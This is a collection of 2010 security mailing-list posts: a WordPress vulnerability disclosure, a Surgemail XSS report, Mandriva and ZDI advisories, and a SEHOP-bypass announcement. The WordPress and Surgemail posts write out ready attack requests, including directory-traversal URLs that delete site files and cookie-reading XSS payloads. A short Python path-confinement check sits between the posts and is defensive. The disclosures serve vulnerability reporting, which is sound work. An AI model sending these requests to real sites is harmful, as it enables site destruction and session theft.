Multiple vulnerabilities in WordPress 2 and 3
Hello Bugtraq! I want to warn you about Cross-Site Scripting, Full path disclosure, Information Leakage, Directory Traversal, Arbitrary File Deletion and Denial of Service vulnerabilities in WordPress.

For all these attacks it's necessary to have access to an admin account, or to an account with rights for working with plugins, or to attack the admin or another user with the required rights via XSS, to find out the token which is designed to protect against CSRF attacks. So users of WordPress don't need to worry much about these holes (if they don't allow the above-mentioned requirements). But these vulnerabilities will come in useful to security researchers who have access to the admin panel or where an XSS exists at the site. So it's better for WP developers to fix them.

Affected products:

Checked in WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Versions 2.0.x are not vulnerable, because they don't have such functionality. Vulnerable to the different vulnerabilities are WordPress 2.6 - 3.0.1 and potentially previous versions.

Details:

While commenting on the XSS vulnerability in WordPress 3.0.1 (http://www.securityfocus.com/archive/1/513250), I mentioned additional information concerning the XSS vulnerability. These nuances also concern the below-mentioned vulnerabilities. It's possible to attack via parameter checked[0], via checked[1] and so on, and also via checked[]. In versions WP 2.7 and higher it's possible to use the parameter action=delete-selected, and in versions 2.8 and higher it's also possible to use the parameter action2=delete-selected.

XSS (WASC-08):

As I pointed out in the above-mentioned letter, in WordPress 2.6.x the Cross-Site Scripting attack is conducted differently. And there is almost no benefit from this XSS.

For the attack it's necessary to send a POST request to http://site/wp-admin/plugins.php with parameters _wpnonce equal to the token's value, delete-selected equal to Delete and checked[] equal to <body onload=alert(document.cookie)>.

Vulnerable are WordPress 2.6.x and potentially previous versions.

Full path disclosure (WASC-13):

For the attack it's necessary to send a POST request to http://site/wp-admin/plugins.php with parameters _wpnonce equal to the token's value, delete-selected equal to Delete and checked[] equal to 1.

Vulnerable are WordPress 2.6.x and potentially previous versions.

Full path disclosure (WASC-13):

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and higher).

Full path disclosure (WASC-13):

http://site/wp-admin/plugins.php

The full path is shown at the page with plugins.

Vulnerable are WordPress 2.6 - 2.7.1.

Information Leakage (WASC-13) + Directory Traversal (WASC-33):

At the page (in the list under the link "Click to view entire list of files which will be deleted") the list of files in the current folder and subfolders is shown.

In folder http://site/wp-content/plugins/:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=

In folder http://site/wp-content/:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and higher). And also WordPress 2.6.x. In versions 2.6.x it's necessary to send the appropriate POST request to http://site/wp-admin/plugins.php (as mentioned above).

Arbitrary File Deletion (WASC-42) + DoS (WASC-10):

If the above-mentioned request is sent with the parameter verify-delete=1, then it's possible to delete files and folders in the current folder and subfolders. Taking into account the Directory Traversal, it's possible to delete all plugins as well as all other files in other folders, including conducting a DoS attack on the site (by deleting important files of WP). E.g. with the request checked[]=../../1 it's possible to delete the whole site.

http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1&verify-delete=1
http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1&verify-delete=1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and higher). And also WordPress 2.6.x. In versions 2.6.x it's necessary to send the appropriate POST request to http://site/wp-admin/plugins.php (as mentioned above).

Timeline:

2010.08.14 - found the vulnerabilities.
2010.09.30 - disclosed at my site.

As I already wrote many times to security mailing lists (http://www.securityfocus.com/archive/1/510274), starting from 2008 I no longer inform WP developers about vulnerabilities in WordPress. I mentioned about these vulnerabilities at my site
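The common root of the listing and deletion issues in the post above is that a checked[] value is joined onto the plugin directory and handed to the file-listing and delete routines without being confined to that directory, so "../1" walks up into wp-content and "../../1" into the site root. The Python below is an added illustration of the confinement check such a handler needs; it is not WordPress code (which is PHP) and not part of the post, and PLUGIN_DIR is an assumed example path that does not need to exist.

```python
import os

# Assumed example path for the demonstration only; it does not have to exist.
# WordPress itself defines the plugin directory as WP_PLUGIN_DIR (PHP).
PLUGIN_DIR = "/var/www/html/wp-content/plugins"


def resolve_plugin_path(base_dir, checked_value):
    """Resolve one user-supplied checked[] value against the plugin directory.

    Returns the absolute, normalised path if it lies strictly inside base_dir,
    otherwise None. This is the check the vulnerable flow lacks: "../1" walks
    up into wp-content, "../../1" into the site root, and an empty value names
    the plugin directory itself.
    """
    if not checked_value:
        # checked[]= (empty) would target the plugin directory as a whole.
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when checked_value is absolute, so absolute
    # input ends up outside base and is rejected below like any traversal.
    candidate = os.path.realpath(os.path.join(base, checked_value))
    if candidate == base:
        return None
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:
        # Different drives on Windows: cannot be inside base.
        return None
    return candidate


def partition_delete_list(base_dir, checked_values):
    """Mimic the bulk delete-selected handler: confine every checked[] value
    before it is listed or deleted, returning (accepted_paths, rejected_inputs)."""
    accepted, rejected = [], []
    for value in checked_values:
        resolved = resolve_plugin_path(base_dir, value)
        if resolved is None:
            rejected.append(value)
        else:
            accepted.append(resolved)
    return accepted, rejected


if __name__ == "__main__":
    # Constructed inputs modelled on the requests in the post above.
    ok, bad = partition_delete_list(
        PLUGIN_DIR, ["hello/hello.php", "", "../1", "../../1", "/etc/passwd"])
    print("accepted:", ok)
    print("rejected:", bad)
```

Resolving with realpath before comparing matters: a plain string prefix test on the unnormalised join would accept "../1" because the joined string still starts with the plugin directory.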
NetWin Surgemail XSS vulnerability
Application: NetWin Surgemail 4.3e
Vendor: NetWin - http://netwinsite.com
Discovered by: Kerem Kocaer <kerem.koc...@bitsec.se>

Problem
---
Cross-site scripting (XSS) vulnerability in the Surgemail webmail login page (/surgemail) allows remote attackers to inject arbitrary web script or HTML. Input passed to the username_ex parameter is not properly sanitised before being returned to the user, thereby enabling the execution of arbitrary script code in a user's browser session, which can lead to cookie theft and session hijacking. The vulnerability is confirmed to exist in version 4.3e (the latest version at the date of vulnerability discovery). Previous versions may also be vulnerable.

Exploit
---
http://[address]/surgeweb?username_ex=</scri<script>alert(document.cookie);</script><input type=hidden
(tested on Firefox)

Fix
---
The vendor has reported fixing the problem in version 4.3g.

Timeline
---
2010-05-13 Notified NetWin (ChrisP.)
2010-05-13 Received response from NetWin
2010-05-13 Provided details to NetWin
2010-05-26 Surgemail patched

Reference
---
CVE Number: CVE-2010-3201
[ MDVSA-2010:191 ] mailman
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:191
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mailman
 Date    : October 1, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in mailman:

 Multiple cross-site scripting (XSS) vulnerabilities in GNU Mailman before 2.1.14rc1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) the list information field or (2) the list description field (CVE-2010-3089).

 Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490

 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3089
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 e08b1d9a020747ab70982e13a105bb48  2008.0/i586/mailman-2.1.9-2.2mdv2008.0.i586.rpm
 749c76d1c7e7f4282b7ffbae1e442763  2008.0/SRPMS/mailman-2.1.9-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 e3bc59b996c69c2721a712ebb794921f  2008.0/x86_64/mailman-2.1.9-2.2mdv2008.0.x86_64.rpm
 749c76d1c7e7f4282b7ffbae1e442763  2008.0/SRPMS/mailman-2.1.9-2.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 21de029e60fc9b80988dff7898ca8658  2009.0/i586/mailman-2.1.11-1.1mdv2009.0.i586.rpm
 f97873131d08c4325a898ab7a715351d  2009.0/SRPMS/mailman-2.1.11-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 7c163192b300d72f301383c395da3b66  2009.0/x86_64/mailman-2.1.11-1.1mdv2009.0.x86_64.rpm
 f97873131d08c4325a898ab7a715351d  2009.0/SRPMS/mailman-2.1.11-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 8ca5797ee931ade6c4756a044e9e9ac6  2009.1/i586/mailman-2.1.12-1.1mdv2009.1.i586.rpm
 73ac7c0336096a0ee1cbf24520220c27  2009.1/SRPMS/mailman-2.1.12-1.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 f750f959be5916b1995391ccdcebb769  2009.1/x86_64/mailman-2.1.12-1.1mdv2009.1.x86_64.rpm
 73ac7c0336096a0ee1cbf24520220c27  2009.1/SRPMS/mailman-2.1.12-1.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 a68bf17fb97f611aa5fd07edbfd25622  2010.0/i586/mailman-2.1.12-3.1mdv2010.0.i586.rpm
 db0d3c48e664467c204d46fb9d5d86c8  2010.0/SRPMS/mailman-2.1.12-3.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 32b176fd2c1f8185ae061ca48020211f  2010.0/x86_64/mailman-2.1.12-3.1mdv2010.0.x86_64.rpm
 db0d3c48e664467c204d46fb9d5d86c8  2010.0/SRPMS/mailman-2.1.12-3.1mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 e83ec834da21aaa9ac825b9dcca38066  2010.1/i586/mailman-2.1.13-1.1mdv2010.1.i586.rpm
 23adc2d02aa602f4195d2133b86e68da  2010.1/SRPMS/mailman-2.1.13-1.1mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 e93de69f96d208190ec865b29cd2  2010.1/x86_64/mailman-2.1.13-1.1mdv2010.1.x86_64.rpm
 23adc2d02aa602f4195d2133b86e68da  2010.1/SRPMS/mailman-2.1.13-1.1mdv2010.1.src.rpm

 Corporate 4.0:
 309605c757131162e730e8d2e77a0331  corporate/4.0/i586/mailman-2.1.6-6.4.20060mlcs4.i586.rpm
 3284f4a4621bd7a6d59ffe9173787a99  corporate/4.0/SRPMS/mailman-2.1.6-6.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 28250e366a8fab9c50d8e3964d593c9b  corporate/4.0/x86_64/mailman-2.1.6-6.4.20060mlcs4.x86_64.rpm
 3284f4a4621bd7a6d59ffe9173787a99  corporate/4.0/SRPMS/mailman-2.1.6-6.4.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 6d2706e0f8f9001a673c8141eed8638d  mes5/i586/mailman-2.1.11-1.1mdvmes5.1.i586.rpm
 f45434df800279721a685123da24af21  mes5/SRPMS/mailman-2.1.11-1.1mdvmes5.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 3d512d16b23e2bd2af6d9380376dd83c  mes5/x86_64/mailman-2.1.11-1.1mdvmes5.1.x86_64.rpm
 f45434df800279721a685123da24af21  mes5/SRPMS/mailman-2.1.11-1.1mdvmes5.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
ZDI-10-189: Novell eDirectory Server Malformed Index Denial of Service Vulnerability
ZDI-10-189: Novell eDirectory Server Malformed Index Denial of Service Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-189
October 1, 2010

-- CVSS:
7.8, (AV:N/AC:L/Au:N/C:N/I:N/A:C)

-- Affected Vendors:
Novell

-- Affected Products:
Novell eDirectory

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9971. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to deny services on vulnerable installations of Novell eDirectory. Authentication is not required in order to trigger this vulnerability.

The flaw exists within Novell's eDirectory Server's NCP implementation which binds, by default, to TCP port 524. While handling a malformed request, the application explicitly trusts a field when translating it to an index into a table of counters. If this index is too large, the application will set a value outside the array and the ndsd process will become unresponsive resulting in an inability to authenticate to that server.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at:

http://www.novell.com/support/viewContent.do?externalId=7006389&sliceId=2

-- Disclosure Timeline:
2009-04-28 - Vulnerability reported to vendor
2010-10-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * 1c239c43f521145fa8385d64a9c32243

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
ZDI-10-190: Novell iManager getMultiPartParameters Arbitrary File Upload Remote Code Execution Vulnerability
ZDI-10-190: Novell iManager getMultiPartParameters Arbitrary File Upload Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-190
October 1, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Novell

-- Affected Products:
Novell iManager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10293. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell iManager. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the nps.jar web application exposed via the Tomcat server running by default on TCP ports 8080 and 8443. The com.novell.nps.serviceProviders.PortalModuleInstallManager servlet exposes a function called getMultiPartParameters which parses POST variables from a multipart form request. The getEntry function that the above uses can be made to write an arbitrary file to disk. An attacker can abuse this to place a malicious JSP document in a web-accessible location. By uploading a malicious script, this can be leveraged to execute remote code under the context of the Tomcat process.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at:

http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2

-- Disclosure Timeline:
2010-07-20 - Vulnerability reported to vendor
2010-10-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Stephen Fewer of Harmony Security (www.harmonysecurity.com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
Another new technique to bypass SEHOP. ( no 'xor pop pop ret' )
Lately, MS Windows SEH overflow attack techniques only use the following methods.

[mostly used methods]
win xp sp2 (SEH): 'pop pop ret' - David Litchfield 2003.
win xp sp3 (SafeSEH): unloaded module's 'pop pop ret' - Litchfield 2003.
win server 2008/Vista sp1 (SEHOP): SYSDREAM(c)'s 'xor pop pop ret'.

[my new method to exploit SEHOP]
I researched SEH and every reference I could find, and found a way to exploit the SafeSEH+SEHOP protections all at once. Below is the presentation PDF. :-)

Presentation URL: http://www.x90c.org/SEH%20all-at-once%20attack.pdf

--
David Litchfield's 2003 presentation introduced a method similar to my technique, using the allowed _except_handler3. But it was applied to SafeSEH only, and has a difference from my technique.
--

Thank you, lists.
[ MDVSA-2010:192 ] apr-util
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:192
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : apr-util
 Date    : October 2, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A denial of service attack against apr_brigade_split_line() was discovered in apr-util (CVE-2010-1623).

 Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1623
 http://svn.apache.org/viewvc?view=revision&revision=1003494
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 0f0a7a89ae55aadde220ec2addb62ecb  2008.0/i586/apr-util-dbd-mysql-1.2.10-1.2mdv2008.0.i586.rpm
 95338fe510f971933c3c8073727ce618  2008.0/i586/apr-util-dbd-pgsql-1.2.10-1.2mdv2008.0.i586.rpm
 3b116b31712e8cb25843e5a5fe82bcfc  2008.0/i586/apr-util-dbd-sqlite3-1.2.10-1.2mdv2008.0.i586.rpm
 37703fb6b512baf59b795530a34e2db0  2008.0/i586/libapr-util1-1.2.10-1.2mdv2008.0.i586.rpm
 0c6d489de4654e52abcac77bf2525497  2008.0/i586/libapr-util-devel-1.2.10-1.2mdv2008.0.i586.rpm
 31f565a4c7e40d22de0d19f6fe27947f  2008.0/SRPMS/apr-util-1.2.10-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 14b4f0ee8d6aa175fa9e31ea2e636644  2008.0/x86_64/apr-util-dbd-mysql-1.2.10-1.2mdv2008.0.x86_64.rpm
 340d47ec560aa3c3c46c26ce4ccf7b80  2008.0/x86_64/apr-util-dbd-pgsql-1.2.10-1.2mdv2008.0.x86_64.rpm
 e5cb7c43589ac3e3cef57c32ed4b48f0  2008.0/x86_64/apr-util-dbd-sqlite3-1.2.10-1.2mdv2008.0.x86_64.rpm
 c049cdabacbbafb05fd775f8c8a4c4f0  2008.0/x86_64/lib64apr-util1-1.2.10-1.2mdv2008.0.x86_64.rpm
 fca193ff0018c87be501b7f1cc17f4a0  2008.0/x86_64/lib64apr-util-devel-1.2.10-1.2mdv2008.0.x86_64.rpm
 31f565a4c7e40d22de0d19f6fe27947f  2008.0/SRPMS/apr-util-1.2.10-1.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 0f656c156450885327bc1ebe8a3d  2009.0/i586/apr-util-dbd-freetds-1.3.4-2.4mdv2009.0.i586.rpm
 0b27531d8603ef0046d1ecbd52bd066b  2009.0/i586/apr-util-dbd-ldap-1.3.4-2.4mdv2009.0.i586.rpm
 b953deb329e282e9581e7e313c07ed76  2009.0/i586/apr-util-dbd-mysql-1.3.4-2.4mdv2009.0.i586.rpm
 447213e5c8f79056ea4feb876100dd8a  2009.0/i586/apr-util-dbd-odbc-1.3.4-2.4mdv2009.0.i586.rpm
 859195910511e75007717a8215a2867d  2009.0/i586/apr-util-dbd-pgsql-1.3.4-2.4mdv2009.0.i586.rpm
 a30f411ba441c03f211897409056cfec  2009.0/i586/apr-util-dbd-sqlite3-1.3.4-2.4mdv2009.0.i586.rpm
 bc7042e923c2417424916b4af22cc011  2009.0/i586/libapr-util1-1.3.4-2.4mdv2009.0.i586.rpm
 cce9d4fa39e9ea354e40dbbab9bf8556  2009.0/i586/libapr-util-devel-1.3.4-2.4mdv2009.0.i586.rpm
 3aff05faba17156c0c2891c840994afb  2009.0/SRPMS/apr-util-1.3.4-2.4mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b5584a5d68829432416dd72637614313  2009.0/x86_64/apr-util-dbd-freetds-1.3.4-2.4mdv2009.0.x86_64.rpm
 7512a01982585a0c13a1900d0fb5cfd0  2009.0/x86_64/apr-util-dbd-ldap-1.3.4-2.4mdv2009.0.x86_64.rpm
 ce1b43cee0adea7473e35dd7bb7a8a80  2009.0/x86_64/apr-util-dbd-mysql-1.3.4-2.4mdv2009.0.x86_64.rpm
 c669db3ca0188ff08e6d960d7caecfa6  2009.0/x86_64/apr-util-dbd-odbc-1.3.4-2.4mdv2009.0.x86_64.rpm
 2dbd14c6c46263100ceb452fff4a4703  2009.0/x86_64/apr-util-dbd-pgsql-1.3.4-2.4mdv2009.0.x86_64.rpm
 2b054ec7c879389f507f99d41a1fa55b  2009.0/x86_64/apr-util-dbd-sqlite3-1.3.4-2.4mdv2009.0.x86_64.rpm
 2824b2b491da4991aecef5fd9b7fa68e  2009.0/x86_64/lib64apr-util1-1.3.4-2.4mdv2009.0.x86_64.rpm
 776f7bd8add07ed6c441a4c79c693bcf  2009.0/x86_64/lib64apr-util-devel-1.3.4-2.4mdv2009.0.x86_64.rpm
 3aff05faba17156c0c2891c840994afb  2009.0/SRPMS/apr-util-1.3.4-2.4mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 001d390f4321be10b4939425b44dec6c  2009.1/i586/apr-util-dbd-freetds-1.3.4-9.3mdv2009.1.i586.rpm
 6e0a9f8d9ce14618ab4f50100af1facf  2009.1/i586/apr-util-dbd-ldap-1.3.4-9.3mdv2009.1.i586.rpm
 9360685a7758c51c691b800ec3426a40  2009.1/i586/apr-util-dbd-mysql-1.3.4-9.3mdv2009.1.i586.rpm
 c81ae900616ce0d7c94f455347e7d6c4  2009.1/i586/apr-util-dbd-odbc-1.3.4-9.3mdv2009.1.i586.rpm
 e891e8f91ce6b5a97b75747978051f65  2009.1/i586/apr-util-dbd-pgsql-1.3.4-9.3mdv2009.1.i586.rpm
 743e80845e68b75df6c73f1fe6c9894f  2009.1/i586/apr-util-dbd-sqlite3-1.3.4-9.3mdv2009.1.i586.rpm
 fce72f37686e7a70cb98d76f471fd2cd  2009.1/i586/libapr-util1-1.3.4-9.3mdv2009.1.i586.rpm
 4a610df132d46c8599bab182dd61665c  2009.1/i586/libapr-util-devel-1.3.4-9.3mdv2009.1.i586.rpm
[ MDVSA-2010:194 ] git
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:194
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : git
 Date    : October 3, 2010
 Affected: 2009.1, 2010.0, 2010.1, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been found and corrected in git:

 Stack-based buffer overflow in the is_git_directory function in setup.c in Git before 1.7.2.1 allows local users to gain privileges via a long gitdir: field in a .git file in a working copy (CVE-2010-2542).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2542
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.1:
 e36c30bb2efd1e37a798f18b2fe0409d  2009.1/i586/git-1.6.2.5-0.2mdv2009.1.i586.rpm
 e24c5595f517896efc3937c3e6f67e3f  2009.1/i586/git-arch-1.6.2.5-0.2mdv2009.1.i586.rpm
 fb822b181161f4896ce1d6dfdeb9bd15  2009.1/i586/git-core-1.6.2.5-0.2mdv2009.1.i586.rpm
 4f7f7ce2826bbca4c2686ec17dc98646  2009.1/i586/git-core-oldies-1.6.2.5-0.2mdv2009.1.i586.rpm
 1de9a3c640a8ab79b0f635c7f28d3566  2009.1/i586/git-cvs-1.6.2.5-0.2mdv2009.1.i586.rpm
 1a15e8c4cf5dcf67305cd82955eb9180  2009.1/i586/git-email-1.6.2.5-0.2mdv2009.1.i586.rpm
 bc58ceed787b7452d8a85180e44ef307  2009.1/i586/gitk-1.6.2.5-0.2mdv2009.1.i586.rpm
 6a0e809737cee3fa4bd23575b6d5437a  2009.1/i586/git-svn-1.6.2.5-0.2mdv2009.1.i586.rpm
 6dcf828363e99ab3dfe2b1539a095eb2  2009.1/i586/gitview-1.6.2.5-0.2mdv2009.1.i586.rpm
 19f0de2a083f34955d6a85b591c8a82b  2009.1/i586/gitweb-1.6.2.5-0.2mdv2009.1.i586.rpm
 729246da7e5812e3d8be48b66f6c96d2  2009.1/i586/libgit-devel-1.6.2.5-0.2mdv2009.1.i586.rpm
 6fa5b0e90caeb83bad4405ca84c3a644  2009.1/i586/perl-Git-1.6.2.5-0.2mdv2009.1.i586.rpm
 5c74a812d839adced666981b16008790  2009.1/SRPMS/git-1.6.2.5-0.2mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 36a163e8dbf812a00f2774737d3db3e3  2009.1/x86_64/git-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 da62d78a1fd8cb3f148da045c98f8697  2009.1/x86_64/git-arch-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 8a944bf53721285cc9fe90fe80f20503  2009.1/x86_64/git-core-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 15ce468ebf23b2e6442da065addc0468  2009.1/x86_64/git-core-oldies-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 e3ba618e5516ee3e0527dd4f656e43be  2009.1/x86_64/git-cvs-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 6be37a10302a9267d186e626437f7fba  2009.1/x86_64/git-email-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 3ae3179b2d6601e99e63136e70d9661e  2009.1/x86_64/gitk-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 cc0f7c402dbd3e4fb3a89c69d7c4bbce  2009.1/x86_64/git-svn-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 d3995ffe7fad83d902a22d7b465dad33  2009.1/x86_64/gitview-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 5266e7b2e209a7a94c854903f1c3dfa6  2009.1/x86_64/gitweb-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 0097c72a5d29c16d7193ca7159826180  2009.1/x86_64/lib64git-devel-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 3bf7309d7ee46a7b6c17954ddae939aa  2009.1/x86_64/perl-Git-1.6.2.5-0.2mdv2009.1.x86_64.rpm
 5c74a812d839adced666981b16008790  2009.1/SRPMS/git-1.6.2.5-0.2mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 05e69d2ef3f77fa187680647094becce  2010.0/i586/git-1.6.4.4-6.1mdv2010.0.i586.rpm
 0a4073b71cf63d4edba0ff3b565a89ba  2010.0/i586/git-arch-1.6.4.4-6.1mdv2010.0.i586.rpm
 caea32abfe0955cc7be5be2d49a69302  2010.0/i586/git-core-1.6.4.4-6.1mdv2010.0.i586.rpm
 9af8db24c9ecde83e6e30542c1a429d3  2010.0/i586/git-core-oldies-1.6.4.4-6.1mdv2010.0.i586.rpm
 9db0d8344eda9b00b2bf98c78fb923c3  2010.0/i586/git-cvs-1.6.4.4-6.1mdv2010.0.i586.rpm
 f1075e86c19920e9d760899745d031f8  2010.0/i586/git-email-1.6.4.4-6.1mdv2010.0.i586.rpm
 92457a4711ceb4c97250a78b541ed716  2010.0/i586/gitk-1.6.4.4-6.1mdv2010.0.i586.rpm
 66063c99e6a26a5a4c93dbd956fd4ba3  2010.0/i586/git-prompt-1.6.4.4-6.1mdv2010.0.i586.rpm
 f3970194c62eccef9b32fb3cab68b55a  2010.0/i586/git-svn-1.6.4.4-6.1mdv2010.0.i586.rpm
 1c17e4705d33069f1776b25531048bda  2010.0/i586/gitview-1.6.4.4-6.1mdv2010.0.i586.rpm
 9d361a0c3ad75a5c68affd14dcc7681b  2010.0/i586/gitweb-1.6.4.4-6.1mdv2010.0.i586.rpm
 d739ac4c7012ebd56b6d401d545243fa  2010.0/i586/libgit-devel-1.6.4.4-6.1mdv2010.0.i586.rpm
 d288543970e5dcd2268d6a7eb60305cc  2010.0/i586/perl-Git-1.6.4.4-6.1mdv2010.0.i586.rpm
 47a9c9ea741437d1432ddd90e32b45e6  2010.0/SRPMS/git-1.6.4.4-6.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 cc3e19b3a6cf10ead6e5a74d478fc39e  2010.0/x86_64/git-1.6.4.4-6.1mdv2010.0.x86_64.rpm
